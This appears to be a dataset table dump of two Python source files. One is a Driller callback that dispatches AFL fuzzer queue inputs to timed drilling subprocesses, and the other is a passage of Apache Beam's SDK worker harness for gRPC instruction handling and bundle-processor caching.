source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
local_callback.py | import os
import sys
import signal
import logging.config
import driller
import argparse
import subprocess
import multiprocessing
l = logging.getLogger("local_callback")
def _run_drill(drill, fuzz, _path_to_input_to_drill, length_extension=None):
    """Spawn a child process that re-runs this module as a script to drill one input.

    The child is wrapped in the ``timeout`` utility so that a hung drilling job
    is terminated after ``drill._worker_timeout`` seconds (and SIGKILLed 10
    seconds after that). The child's stdout is captured and echoed here.
    """
    binary = fuzz.binary_path
    out_dir = fuzz.out_dir
    bitmap = os.path.join(out_dir, 'fuzzer-master', "fuzz_bitmap")
    timeout = drill._worker_timeout

    l.warning("starting drilling of %s, %s",
              os.path.basename(binary),
              os.path.basename(_path_to_input_to_drill))

    # Re-invoke this very file as a standalone script under `timeout`.
    cmd = [
        "timeout", "-k", str(timeout + 10), str(timeout),
        sys.executable, os.path.abspath(__file__),
        binary, out_dir, bitmap, _path_to_input_to_drill,
    ]
    if length_extension:
        cmd.extend(('--length-extension', str(length_extension)))

    proc = subprocess.Popen(cmd, stdout=subprocess.PIPE)
    print(proc.communicate())
class LocalCallback(object):
    """Driller "stuck" callback that drills fuzzer queue entries locally.

    Each not-yet-drilled input found in the fuzzer's queue is handed to a
    worker subprocess (at most ``num_workers`` alive at a time), which
    re-executes this module as a script via ``_run_drill``.
    """

    def __init__(self, num_workers=1, worker_timeout=10*60, length_extension=None):
        # Absolute paths of queue entries already dispatched for drilling.
        self._already_drilled_inputs = set()

        self._num_workers = num_workers
        # Live multiprocessing.Process objects; pruned on each callback.
        self._running_workers = []
        # Seconds a worker may run before `timeout` kills it.
        self._worker_timeout = worker_timeout
        # Optional number of NUL bytes to append as an extended variant.
        self._length_extension = length_extension

    @staticmethod
    def _queue_files(fuzz, fuzzer='fuzzer-master'):
        '''
        retrieve the current queue of inputs from a fuzzer
        :return: a list of strings which represent a fuzzer's queue
        '''
        queue_path = os.path.join(fuzz.out_dir, fuzzer, 'queue')
        # ".state" is AFL bookkeeping, not a testcase -- skip it.
        return [
            os.path.join(queue_path, q)
            for q in os.listdir(queue_path) if q != ".state"
        ]

    def driller_callback(self, fuzz):
        """Dispatch drilling jobs for any queue entries not yet drilled."""
        l.warning("Driller stuck callback triggered!")
        # remove any workers that aren't running
        self._running_workers = [x for x in self._running_workers if x.is_alive()]

        # get the files in queue
        queue = self._queue_files(fuzz)
        #for i in range(1, fuzz.fuzz_id):
        #    fname = "fuzzer-%d" % i
        #    queue.extend(self.queue_files(fname))

        # start drilling
        not_drilled = set(queue) - self._already_drilled_inputs
        if len(not_drilled) == 0:
            l.warning("no inputs left to drill")

        while len(self._running_workers) < self._num_workers and len(not_drilled) > 0:
            # set.pop() is O(1); the original materialized the whole set into
            # a list on every iteration just to take one element (O(n^2)).
            to_drill_path = not_drilled.pop()
            self._already_drilled_inputs.add(to_drill_path)

            proc = multiprocessing.Process(
                target=_run_drill, args=(self, fuzz, to_drill_path),
                kwargs={'length_extension': self._length_extension})
            proc.start()
            self._running_workers.append(proc)
    __call__ = driller_callback

    def kill(self):
        """Forcefully terminate all known worker processes (best effort)."""
        for p in self._running_workers:
            try:
                p.terminate()
                os.kill(p.pid, signal.SIGKILL)
            except OSError:
                # Worker already gone; nothing to clean up.
                pass
# this is for running with bash timeout
if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Driller local callback")
    parser.add_argument('binary_path')
    parser.add_argument('fuzzer_out_dir')
    parser.add_argument('bitmap_path')
    parser.add_argument('path_to_input_to_drill')
    parser.add_argument('--length-extension', help="Try extending inputs to driller by this many bytes", type=int)
    args = parser.parse_args()

    logcfg_file = os.path.join(os.getcwd(), '.driller.ini')
    if os.path.isfile(logcfg_file):
        logging.config.fileConfig(logcfg_file)

    # Read the AFL coverage bitmap driller will diff against.
    with open(args.bitmap_path, "rb") as f:
        fuzzer_bitmap = f.read()

    # create a folder for driller's own queue of newly found inputs
    driller_dir = os.path.join(args.fuzzer_out_dir, "driller")
    driller_queue_dir = os.path.join(driller_dir, "queue")
    try: os.mkdir(driller_dir)
    except OSError: pass
    try: os.mkdir(driller_queue_dir)
    except OSError: pass

    l.debug('drilling %s', args.path_to_input_to_drill)

    # get the input (and, optionally, a NUL-extended variant of it)
    with open(args.path_to_input_to_drill, "rb") as f:
        inputs_to_drill = [f.read()]
    if args.length_extension:
        # BUGFIX: the seed was read in binary mode, so the padding must be a
        # bytes literal -- '\0' * n (str) raised TypeError on Python 3.
        inputs_to_drill.append(inputs_to_drill[0] + b'\0' * args.length_extension)

    for input_to_drill in inputs_to_drill:
        d = driller.Driller(args.binary_path, input_to_drill, fuzzer_bitmap)
        count = 0
        for new_input in d.drill_generator():
            # AFL-style file name: id:NNNNNN,from:<fuzzer><orig id>
            id_num = len(os.listdir(driller_queue_dir))
            fuzzer_from = args.path_to_input_to_drill.split("sync/")[1].split("/")[0] + args.path_to_input_to_drill.split("id:")[1].split(",")[0]
            filepath = "id:" + ("%d" % id_num).rjust(6, "0") + ",from:" + fuzzer_from
            filepath = os.path.join(driller_queue_dir, filepath)
            with open(filepath, "wb") as f:
                f.write(new_input[1])
            count += 1
        l.warning("found %d new inputs", count)
|
sdk_worker.py | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""SDK harness for executing Python Fns via the Fn API."""
# pytype: skip-file
# mypy: disallow-untyped-defs
import abc
import collections
import contextlib
import functools
import logging
import queue
import sys
import threading
import time
import traceback
from concurrent import futures
from types import TracebackType
from typing import TYPE_CHECKING
from typing import Any
from typing import Callable
from typing import DefaultDict
from typing import Dict
from typing import FrozenSet
from typing import Generic
from typing import Iterable
from typing import Iterator
from typing import List
from typing import MutableMapping
from typing import Optional
from typing import Tuple
from typing import Type
from typing import TypeVar
from typing import Union
import grpc
from apache_beam.coders import coder_impl
from apache_beam.metrics import monitoring_infos
from apache_beam.metrics.execution import MetricsEnvironment
from apache_beam.portability.api import beam_fn_api_pb2
from apache_beam.portability.api import beam_fn_api_pb2_grpc
from apache_beam.portability.api import metrics_pb2
from apache_beam.runners.worker import bundle_processor
from apache_beam.runners.worker import data_plane
from apache_beam.runners.worker import statesampler
from apache_beam.runners.worker.channel_factory import GRPCChannelFactory
from apache_beam.runners.worker.data_plane import PeriodicThread
from apache_beam.runners.worker.statecache import StateCache
from apache_beam.runners.worker.worker_id_interceptor import WorkerIdInterceptor
from apache_beam.runners.worker.worker_status import FnApiWorkerStatusHandler
from apache_beam.runners.worker.worker_status import thread_dump
from apache_beam.utils import thread_pool_executor
from apache_beam.utils.sentinel import Sentinel
if TYPE_CHECKING:
from apache_beam.portability.api import endpoints_pb2
from apache_beam.utils.profiler import Profile
ExcInfo = Tuple[Type[BaseException], BaseException, TracebackType]
OptExcInfo = Union[ExcInfo, Tuple[None, None, None]]
T = TypeVar('T')
_KT = TypeVar('_KT')
_VT = TypeVar('_VT')
_LOGGER = logging.getLogger(__name__)
# This SDK harness will (by default), log a "lull" in processing if it sees no
# transitions in over 5 minutes.
# 5 minutes * 60 seconds * 1000 millis * 1000 micros * 1000 nanoseconds
DEFAULT_LOG_LULL_TIMEOUT_NS = 5 * 60 * 1000 * 1000 * 1000
DEFAULT_BUNDLE_PROCESSOR_CACHE_SHUTDOWN_THRESHOLD_S = 60
# Full thread dump is performed at most every 20 minutes.
LOG_LULL_FULL_THREAD_DUMP_INTERVAL_S = 20 * 60
# Full thread dump is performed if the lull is more than 20 minutes.
LOG_LULL_FULL_THREAD_DUMP_LULL_S = 20 * 60
# The number of ProcessBundleRequest instruction ids the BundleProcessorCache
# will remember for not running instructions.
MAX_KNOWN_NOT_RUNNING_INSTRUCTIONS = 1000
# The number of ProcessBundleRequest instruction ids that BundleProcessorCache
# will remember for failed instructions.
MAX_FAILED_INSTRUCTIONS = 10000
class ShortIdCache(object):
  """Bidirectional, thread-safe cache assigning compact "short ids" to
  MonitoringInfos."""
  def __init__(self):
    # type: () -> None
    self._lock = threading.Lock()
    self._last_short_id = 0
    self._info_key_to_short_id = {}  # type: Dict[FrozenSet, str]
    self._short_id_to_info = {}  # type: Dict[str, metrics_pb2.MonitoringInfo]

  def get_short_id(self, monitoring_info):
    # type: (metrics_pb2.MonitoringInfo) -> str
    """Returns the shortId assigned to the given MonitoringInfo, creating a
    new assignment the first time the info's key is seen.
    """
    key = monitoring_infos.to_key(monitoring_info)
    with self._lock:
      existing = self._info_key_to_short_id.get(key)
      if existing is not None:
        return existing
      self._last_short_id += 1
      # Hex without the leading '0x' keeps the id compact.
      short_id = hex(self._last_short_id)[2:]
      # Store a copy with the payload stripped; only metadata is kept.
      stripped = metrics_pb2.MonitoringInfo()
      stripped.CopyFrom(monitoring_info)
      stripped.ClearField('payload')
      self._info_key_to_short_id[key] = short_id
      self._short_id_to_info[short_id] = stripped
      return short_id

  def get_infos(self, short_ids):
    #type: (Iterable[str]) -> Dict[str, metrics_pb2.MonitoringInfo]
    """Resolves each short ID to its payload-cleared MonitoringInfo.

    Raises KeyError if any short ID was never assigned.
    """
    return {sid: self._short_id_to_info[sid] for sid in short_ids}


SHORT_ID_CACHE = ShortIdCache()
class SdkHarness(object):
  """SDK-side control connection to the runner.

  Connects to the Fn API control service at ``control_address``, then reads
  InstructionRequests off the bidirectional Control stream, dispatches each to
  the ``_request_<type>`` method named after its request oneof, and streams
  InstructionResponses back via an internal queue.
  """

  REQUEST_METHOD_PREFIX = '_request_'

  def __init__(
      self,
      control_address,  # type: str
      credentials=None,  # type: Optional[grpc.ChannelCredentials]
      worker_id=None,  # type: Optional[str]
      # Caching is disabled by default
      state_cache_size=0,  # type: int
      # time-based data buffering is disabled by default
      data_buffer_time_limit_ms=0,  # type: int
      profiler_factory=None,  # type: Optional[Callable[..., Profile]]
      status_address=None,  # type: Optional[str]
      # Heap dump through status api is disabled by default
      enable_heap_dump=False,  # type: bool
  ):
    # type: (...) -> None
    self._alive = True
    self._worker_index = 0
    self._worker_id = worker_id
    self._state_cache = StateCache(state_cache_size)
    # No limits (-1) on gRPC message sizes on the control channel.
    options = [('grpc.max_receive_message_length', -1),
               ('grpc.max_send_message_length', -1)]
    if credentials is None:
      _LOGGER.info('Creating insecure control channel for %s.', control_address)
      self._control_channel = GRPCChannelFactory.insecure_channel(
          control_address, options=options)
    else:
      _LOGGER.info('Creating secure control channel for %s.', control_address)
      self._control_channel = GRPCChannelFactory.secure_channel(
          control_address, credentials, options=options)
    # Block until the control channel is usable (fail after 60s).
    grpc.channel_ready_future(self._control_channel).result(timeout=60)
    _LOGGER.info('Control channel established.')

    # Attach the worker id to every outgoing request on this channel.
    self._control_channel = grpc.intercept_channel(
        self._control_channel, WorkerIdInterceptor(self._worker_id))
    self._data_channel_factory = data_plane.GrpcClientDataChannelFactory(
        credentials, self._worker_id, data_buffer_time_limit_ms)
    self._state_handler_factory = GrpcStateHandlerFactory(
        self._state_cache, credentials)
    self._profiler_factory = profiler_factory

    def default_factory(id):
      # type: (str) -> beam_fn_api_pb2.ProcessBundleDescriptor
      # Lazily fetch bundle descriptors not yet known from the runner.
      return self._control_stub.GetProcessBundleDescriptor(
          beam_fn_api_pb2.GetProcessBundleDescriptorRequest(
              process_bundle_descriptor_id=id))

    self._fns = KeyedDefaultDict(default_factory)
    # BundleProcessor cache across all workers.
    self._bundle_processor_cache = BundleProcessorCache(
        state_handler_factory=self._state_handler_factory,
        data_channel_factory=self._data_channel_factory,
        fns=self._fns)

    if status_address:
      try:
        self._status_handler = FnApiWorkerStatusHandler(
            status_address, self._bundle_processor_cache,
            enable_heap_dump)  # type: Optional[FnApiWorkerStatusHandler]
      except Exception:
        # NOTE(review): if construction raises, _status_handler is never
        # assigned, so run()'s `if self._status_handler:` would raise
        # AttributeError -- confirm whether this path is reachable in practice.
        traceback_string = traceback.format_exc()
        _LOGGER.warning(
            'Error creating worker status request handler, '
            'skipping status report. Trace back: %s' % traceback_string)
    else:
      self._status_handler = None

    # TODO(BEAM-8998) use common
    # thread_pool_executor.shared_unbounded_instance() to process bundle
    # progress once dataflow runner's excessive progress polling is removed.
    self._report_progress_executor = futures.ThreadPoolExecutor(max_workers=1)
    self._worker_thread_pool = thread_pool_executor.shared_unbounded_instance()
    # Responses queued here are drained by get_responses() inside run().
    self._responses = queue.Queue(
    )  # type: queue.Queue[Union[beam_fn_api_pb2.InstructionResponse, Sentinel]]
    _LOGGER.info('Initializing SDKHarness with unbounded number of workers.')

  def run(self):
    # type: () -> None
    """Runs the control loop until the runner closes the control stream,
    then drains in-flight work and shuts down all owned resources."""
    self._control_stub = beam_fn_api_pb2_grpc.BeamFnControlStub(
        self._control_channel)
    no_more_work = Sentinel.sentinel

    def get_responses():
      # type: () -> Iterator[beam_fn_api_pb2.InstructionResponse]
      # Generator fed into the bidirectional Control() stream; ends when the
      # sentinel is queued.
      while True:
        response = self._responses.get()
        if response is no_more_work:
          return
        yield response

    self._alive = True

    try:
      for work_request in self._control_stub.Control(get_responses()):
        _LOGGER.debug('Got work %s', work_request.instruction_id)
        request_type = work_request.WhichOneof('request')
        # Name spacing the request method with 'request_'. The called method
        # will be like self.request_register(request)
        getattr(self, SdkHarness.REQUEST_METHOD_PREFIX + request_type)(
            work_request)
    finally:
      self._alive = False

    _LOGGER.info('No more requests from control plane')
    _LOGGER.info('SDK Harness waiting for in-flight requests to complete')
    # Wait until existing requests are processed.
    self._worker_thread_pool.shutdown()
    # get_responses may be blocked on responses.get(), but we need to return
    # control to its caller.
    self._responses.put(no_more_work)
    # Stop all the workers and clean all the associated resources
    self._data_channel_factory.close()
    self._state_handler_factory.close()
    self._bundle_processor_cache.shutdown()
    if self._status_handler:
      self._status_handler.close()
    _LOGGER.info('Done consuming work.')

  def _execute(
      self,
      task,  # type: Callable[[], beam_fn_api_pb2.InstructionResponse]
      request  # type: beam_fn_api_pb2.InstructionRequest
  ):
    # type: (...) -> None
    """Runs ``task``, converting any exception into an error response, and
    enqueues the resulting response for the control stream."""
    with statesampler.instruction_id(request.instruction_id):
      try:
        response = task()
      except Exception:  # pylint: disable=broad-except
        traceback_string = traceback.format_exc()
        print(traceback_string, file=sys.stderr)
        _LOGGER.error(
            'Error processing instruction %s. Original traceback is\n%s\n',
            request.instruction_id,
            traceback_string)
        response = beam_fn_api_pb2.InstructionResponse(
            instruction_id=request.instruction_id, error=traceback_string)
      self._responses.put(response)

  def _request_register(self, request):
    # type: (beam_fn_api_pb2.InstructionRequest) -> None
    # registration request is handled synchronously
    self._execute(lambda: self.create_worker().do_instruction(request), request)

  def _request_process_bundle(self, request):
    # type: (beam_fn_api_pb2.InstructionRequest) -> None
    # Announce the instruction before scheduling so cache lookup() can see it.
    self._bundle_processor_cache.activate(request.instruction_id)
    self._request_execute(request)

  def _request_process_bundle_split(self, request):
    # type: (beam_fn_api_pb2.InstructionRequest) -> None
    self._request_process_bundle_action(request)

  def _request_process_bundle_progress(self, request):
    # type: (beam_fn_api_pb2.InstructionRequest) -> None
    self._request_process_bundle_action(request)

  def _request_process_bundle_action(self, request):
    # type: (beam_fn_api_pb2.InstructionRequest) -> None
    # Split/progress requests run on a dedicated single-thread executor so
    # they are not starved by bundle processing on the shared pool.
    def task():
      # type: () -> None
      self._execute(
          lambda: self.create_worker().do_instruction(request), request)

    self._report_progress_executor.submit(task)

  def _request_finalize_bundle(self, request):
    # type: (beam_fn_api_pb2.InstructionRequest) -> None
    self._request_execute(request)

  def _request_harness_monitoring_infos(self, request):
    # type: (beam_fn_api_pb2.InstructionRequest) -> None
    # Report process-wide metrics keyed by their short ids.
    process_wide_monitoring_infos = MetricsEnvironment.process_wide_container(
    ).to_runner_api_monitoring_infos(None).values()
    self._execute(
        lambda: beam_fn_api_pb2.InstructionResponse(
            instruction_id=request.instruction_id,
            harness_monitoring_infos=(
                beam_fn_api_pb2.HarnessMonitoringInfosResponse(
                    monitoring_data={
                        SHORT_ID_CACHE.get_short_id(info): info.payload
                        for info in process_wide_monitoring_infos
                    }))),
        request)

  def _request_monitoring_infos(self, request):
    # type: (beam_fn_api_pb2.InstructionRequest) -> None
    # Resolve previously reported short ids back to full MonitoringInfos.
    self._execute(
        lambda: beam_fn_api_pb2.InstructionResponse(
            instruction_id=request.instruction_id,
            monitoring_infos=beam_fn_api_pb2.MonitoringInfosMetadataResponse(
                monitoring_info=SHORT_ID_CACHE.get_infos(
                    request.monitoring_infos.monitoring_info_id))),
        request)

  def _request_execute(self, request):
    # type: (beam_fn_api_pb2.InstructionRequest) -> None
    # Schedule the instruction on the shared (unbounded) worker thread pool.
    def task():
      # type: () -> None
      self._execute(
          lambda: self.create_worker().do_instruction(request), request)

    self._worker_thread_pool.submit(task)
    _LOGGER.debug(
        "Currently using %s threads." % len(self._worker_thread_pool._workers))

  def create_worker(self):
    # type: () -> SdkWorker
    """Creates a new ``SdkWorker`` sharing this harness's processor cache,
    state-cache metrics hook and profiler factory."""
    return SdkWorker(
        self._bundle_processor_cache,
        state_cache_metrics_fn=self._state_cache.get_monitoring_infos,
        profiler_factory=self._profiler_factory)
class BundleProcessorCache(object):
  """A cache for ``BundleProcessor``s.

  ``BundleProcessor`` objects are cached by the id of their
  ``beam_fn_api_pb2.ProcessBundleDescriptor``.

  Attributes:
    fns (dict): A dictionary that maps bundle descriptor IDs to instances of
      ``beam_fn_api_pb2.ProcessBundleDescriptor``.
    state_handler_factory (``StateHandlerFactory``): Used to create state
      handlers to be used by a ``bundle_processor.BundleProcessor`` during
      processing.
    data_channel_factory (``data_plane.DataChannelFactory``)
    active_bundle_processors (dict): A dictionary, indexed by instruction IDs,
      containing ``bundle_processor.BundleProcessor`` objects that are currently
      active processing the corresponding instruction.
    cached_bundle_processors (dict): A dictionary, indexed by bundle processor
      id, of cached ``bundle_processor.BundleProcessor`` that are not currently
      performing processing.
  """

  periodic_shutdown = None  # type: Optional[PeriodicThread]

  def __init__(
      self,
      state_handler_factory,  # type: StateHandlerFactory
      data_channel_factory,  # type: data_plane.DataChannelFactory
      fns  # type: MutableMapping[str, beam_fn_api_pb2.ProcessBundleDescriptor]
  ):
    # type: (...) -> None
    self.fns = fns
    self.state_handler_factory = state_handler_factory
    self.data_channel_factory = data_channel_factory
    # Bounded instruction-id sets kept as OrderedDicts so the oldest entry
    # can be evicted (popitem(last=False)) once a size cap is reached.
    self.known_not_running_instruction_ids = collections.OrderedDict(
    )  # type: collections.OrderedDict[str, bool]
    self.failed_instruction_ids = collections.OrderedDict(
    )  # type: collections.OrderedDict[str, bool]
    self.active_bundle_processors = {
    }  # type: Dict[str, Tuple[str, bundle_processor.BundleProcessor]]
    self.cached_bundle_processors = collections.defaultdict(
        list)  # type: DefaultDict[str, List[bundle_processor.BundleProcessor]]
    # Last release() time per descriptor id, used by the periodic shutdown.
    self.last_access_times = collections.defaultdict(
        float)  # type: DefaultDict[str, float]
    self._schedule_periodic_shutdown()
    self._lock = threading.Lock()

  def register(self, bundle_descriptor):
    # type: (beam_fn_api_pb2.ProcessBundleDescriptor) -> None
    """Register a ``beam_fn_api_pb2.ProcessBundleDescriptor`` by its id."""
    self.fns[bundle_descriptor.id] = bundle_descriptor

  def activate(self, instruction_id):
    # type: (str) -> None
    """Makes the ``instruction_id`` known to the bundle processor.

    Allows ``lookup`` to return ``None``. Necessary if ``lookup`` can occur
    before ``get``.
    """
    with self._lock:
      self.known_not_running_instruction_ids[instruction_id] = True

  def get(self, instruction_id, bundle_descriptor_id):
    # type: (str, str) -> bundle_processor.BundleProcessor
    """
    Return the requested ``BundleProcessor``, creating it if necessary.

    Moves the ``BundleProcessor`` from the inactive to the active cache.
    """
    with self._lock:
      try:
        # pop() is threadsafe
        processor = self.cached_bundle_processors[bundle_descriptor_id].pop()
        self.active_bundle_processors[
            instruction_id] = bundle_descriptor_id, processor
        try:
          del self.known_not_running_instruction_ids[instruction_id]
        except KeyError:
          # The instruction may have not been pre-registered before execution
          # since activate() may have never been invoked
          pass
        return processor
      except IndexError:
        # No cached processor for this descriptor -- fall through and build one.
        pass

    # Make sure we instantiate the processor while not holding the lock.
    processor = bundle_processor.BundleProcessor(
        self.fns[bundle_descriptor_id],
        self.state_handler_factory.create_state_handler(
            self.fns[bundle_descriptor_id].state_api_service_descriptor),
        self.data_channel_factory)
    with self._lock:
      self.active_bundle_processors[
          instruction_id] = bundle_descriptor_id, processor
      try:
        del self.known_not_running_instruction_ids[instruction_id]
      except KeyError:
        # The instruction may have not been pre-registered before execution
        # since activate() may have never been invoked
        pass
    return processor

  def lookup(self, instruction_id):
    # type: (str) -> Optional[bundle_processor.BundleProcessor]
    """
    Return the requested ``BundleProcessor`` from the cache.

    Will return ``None`` if the BundleProcessor is known but not yet ready. Will
    raise an error if the ``instruction_id`` is not known or has been discarded.
    """
    with self._lock:
      if instruction_id in self.failed_instruction_ids:
        raise RuntimeError(
            'Bundle processing associated with %s has failed. '
            'Check prior failing response for details.' % instruction_id)
      processor = self.active_bundle_processors.get(
          instruction_id, (None, None))[-1]
      if processor:
        return processor
      if instruction_id in self.known_not_running_instruction_ids:
        return None
      raise RuntimeError('Unknown process bundle id %s.' % instruction_id)

  def discard(self, instruction_id):
    # type: (str) -> None
    """
    Marks the instruction id as failed shutting down the ``BundleProcessor``.
    """
    with self._lock:
      self.failed_instruction_ids[instruction_id] = True
      # Keep the failed-id memory bounded; evict the oldest entries first.
      while len(self.failed_instruction_ids) > MAX_FAILED_INSTRUCTIONS:
        self.failed_instruction_ids.popitem(last=False)
      processor = self.active_bundle_processors[instruction_id][1]
      del self.active_bundle_processors[instruction_id]

    # Perform the shutdown while not holding the lock.
    processor.shutdown()

  def release(self, instruction_id):
    # type: (str) -> None
    """
    Release the requested ``BundleProcessor``.

    Resets the ``BundleProcessor`` and moves it from the active to the
    inactive cache.
    """
    with self._lock:
      self.known_not_running_instruction_ids[instruction_id] = True
      # Bound the known-not-running set; evict the oldest entries first.
      while len(self.known_not_running_instruction_ids
                ) > MAX_KNOWN_NOT_RUNNING_INSTRUCTIONS:
        self.known_not_running_instruction_ids.popitem(last=False)
      descriptor_id, processor = (
          self.active_bundle_processors.pop(instruction_id))

    # Make sure that we reset the processor while not holding the lock.
    processor.reset()
    with self._lock:
      self.last_access_times[descriptor_id] = time.time()
      self.cached_bundle_processors[descriptor_id].append(processor)

  def shutdown(self):
    # type: () -> None
    """
    Shutdown all ``BundleProcessor``s in the cache.
    """
    if self.periodic_shutdown:
      self.periodic_shutdown.cancel()
      self.periodic_shutdown.join()
      self.periodic_shutdown = None

    # Discard active processors first, then drain the inactive cache.
    for instruction_id in list(self.active_bundle_processors.keys()):
      self.discard(instruction_id)
    for cached_bundle_processors in self.cached_bundle_processors.values():
      BundleProcessorCache._shutdown_cached_bundle_processors(
          cached_bundle_processors)

  def _schedule_periodic_shutdown(self):
    # type: () -> None
    # Starts a daemon thread that periodically shuts down cached (inactive)
    # processors whose descriptor has not been used within the threshold.
    def shutdown_inactive_bundle_processors():
      # type: () -> None
      for descriptor_id, last_access_time in self.last_access_times.items():
        if (time.time() - last_access_time >
            DEFAULT_BUNDLE_PROCESSOR_CACHE_SHUTDOWN_THRESHOLD_S):
          BundleProcessorCache._shutdown_cached_bundle_processors(
              self.cached_bundle_processors[descriptor_id])

    self.periodic_shutdown = PeriodicThread(
        DEFAULT_BUNDLE_PROCESSOR_CACHE_SHUTDOWN_THRESHOLD_S,
        shutdown_inactive_bundle_processors)
    self.periodic_shutdown.daemon = True
    self.periodic_shutdown.start()

  @staticmethod
  def _shutdown_cached_bundle_processors(cached_bundle_processors):
    # type: (List[bundle_processor.BundleProcessor]) -> None
    # Drains the list via pop() so concurrent appenders are not affected.
    try:
      while True:
        # pop() is threadsafe
        bundle_processor = cached_bundle_processors.pop()
        bundle_processor.shutdown()
    except IndexError:
      # List exhausted -- nothing left to shut down.
      pass
class SdkWorker(object):
  """Executes single instruction requests using (cached) ``BundleProcessor``s."""

  def __init__(
      self,
      bundle_processor_cache,  # type: BundleProcessorCache
      state_cache_metrics_fn=list,  # type: Callable[[], Iterable[metrics_pb2.MonitoringInfo]]
      profiler_factory=None,  # type: Optional[Callable[..., Profile]]
      log_lull_timeout_ns=None,  # type: Optional[int]
  ):
    # type: (...) -> None
    self.bundle_processor_cache = bundle_processor_cache
    # Zero-arg callable producing state-cache metrics appended to responses.
    self.state_cache_metrics_fn = state_cache_metrics_fn
    self.profiler_factory = profiler_factory
    # Nanoseconds without a state transition before a "lull" is logged.
    self.log_lull_timeout_ns = (
        log_lull_timeout_ns or DEFAULT_LOG_LULL_TIMEOUT_NS)
    self._last_full_thread_dump_secs = 0.0

  def do_instruction(self, request):
    # type: (beam_fn_api_pb2.InstructionRequest) -> beam_fn_api_pb2.InstructionResponse
    """Dispatches ``request`` to the method named after its request oneof."""
    request_type = request.WhichOneof('request')
    if request_type:
      # E.g. if register is set, this will call self.register(request.register))
      return getattr(self, request_type)(
          getattr(request, request_type), request.instruction_id)
    else:
      raise NotImplementedError

  def register(
      self,
      request,  # type: beam_fn_api_pb2.RegisterRequest
      instruction_id  # type: str
  ):
    # type: (...) -> beam_fn_api_pb2.InstructionResponse
    """Registers a set of ``beam_fn_api_pb2.ProcessBundleDescriptor``s.

    This set of ``beam_fn_api_pb2.ProcessBundleDescriptor`` come as part of a
    ``beam_fn_api_pb2.RegisterRequest``, which the runner sends to the SDK
    worker before starting processing to register stages.
    """
    for process_bundle_descriptor in request.process_bundle_descriptor:
      self.bundle_processor_cache.register(process_bundle_descriptor)
    return beam_fn_api_pb2.InstructionResponse(
        instruction_id=instruction_id,
        register=beam_fn_api_pb2.RegisterResponse())

  def process_bundle(
      self,
      request,  # type: beam_fn_api_pb2.ProcessBundleRequest
      instruction_id  # type: str
  ):
    # type: (...) -> beam_fn_api_pb2.InstructionResponse
    """Processes one bundle and returns its response with monitoring data.

    On any failure the processor is discarded so it is never reused; on
    success it is released back to the cache unless finalization is pending.
    """
    bundle_processor = self.bundle_processor_cache.get(
        instruction_id, request.process_bundle_descriptor_id)
    try:
      with bundle_processor.state_handler.process_instruction_id(
          instruction_id, request.cache_tokens):
        with self.maybe_profile(instruction_id):
          delayed_applications, requests_finalization = (
              bundle_processor.process_bundle(instruction_id))
          monitoring_infos = bundle_processor.monitoring_infos()
          monitoring_infos.extend(self.state_cache_metrics_fn())
          response = beam_fn_api_pb2.InstructionResponse(
              instruction_id=instruction_id,
              process_bundle=beam_fn_api_pb2.ProcessBundleResponse(
                  residual_roots=delayed_applications,
                  monitoring_infos=monitoring_infos,
                  monitoring_data={
                      SHORT_ID_CACHE.get_short_id(info): info.payload
                      for info in monitoring_infos
                  },
                  requires_finalization=requests_finalization))
      # Don't release here if finalize is needed.
      if not requests_finalization:
        self.bundle_processor_cache.release(instruction_id)
      return response
    except:  # pylint: disable=broad-except
      # Don't re-use bundle processors on failure.
      self.bundle_processor_cache.discard(instruction_id)
      raise

  def process_bundle_split(
      self,
      request,  # type: beam_fn_api_pb2.ProcessBundleSplitRequest
      instruction_id  # type: str
  ):
    # type: (...) -> beam_fn_api_pb2.InstructionResponse
    """Attempts to split the referenced in-flight bundle."""
    try:
      processor = self.bundle_processor_cache.lookup(request.instruction_id)
    except RuntimeError:
      # Unknown or failed instruction id -- report the error to the runner.
      return beam_fn_api_pb2.InstructionResponse(
          instruction_id=instruction_id, error=traceback.format_exc())
    # Return an empty response if we aren't running. This can happen
    # if the ProcessBundleRequest has not started or already finished.
    process_bundle_split = (
        processor.try_split(request)
        if processor else beam_fn_api_pb2.ProcessBundleSplitResponse())
    return beam_fn_api_pb2.InstructionResponse(
        instruction_id=instruction_id,
        process_bundle_split=process_bundle_split)

  def _log_lull_in_bundle_processor(self, processor):
    # type: (bundle_processor.BundleProcessor) -> None
    sampler_info = processor.state_sampler.get_info()
    self._log_lull_sampler_info(sampler_info)

  def _log_lull_sampler_info(self, sampler_info):
    # type: (statesampler.StateSamplerInfo) -> None
    # Logs a warning (with the stuck thread's stack, when obtainable) if no
    # state transition happened for longer than log_lull_timeout_ns.
    if (sampler_info and sampler_info.time_since_transition and
        sampler_info.time_since_transition > self.log_lull_timeout_ns):
      step_name = sampler_info.state_name.step_name
      state_name = sampler_info.state_name.name
      lull_seconds = sampler_info.time_since_transition / 1e9
      state_lull_log = (
          'Operation ongoing for over %.2f seconds in state %s' %
          (lull_seconds, state_name))
      step_name_log = (' in step %s ' % step_name) if step_name else ''

      exec_thread = getattr(sampler_info, 'tracked_thread', None)
      if exec_thread is not None:
        thread_frame = sys._current_frames().get(exec_thread.ident)  # pylint: disable=protected-access
        stack_trace = '\n'.join(
            traceback.format_stack(thread_frame)) if thread_frame else ''
      else:
        stack_trace = '-NOT AVAILABLE-'

      _LOGGER.warning(
          '%s%s without returning. Current Traceback:\n%s',
          state_lull_log,
          step_name_log,
          stack_trace)

      if self._should_log_full_thread_dump(lull_seconds):
        self._log_full_thread_dump()

  def _should_log_full_thread_dump(self, lull_seconds):
    # type: (float) -> bool
    # Only dump for long lulls, and rate-limit dumps to once per interval.
    if lull_seconds < LOG_LULL_FULL_THREAD_DUMP_LULL_S:
      return False
    now = time.time()
    if (self._last_full_thread_dump_secs + LOG_LULL_FULL_THREAD_DUMP_INTERVAL_S
        < now):
      self._last_full_thread_dump_secs = now
      return True
    return False

  def _log_full_thread_dump(self):
    # type: () -> None
    thread_dump()

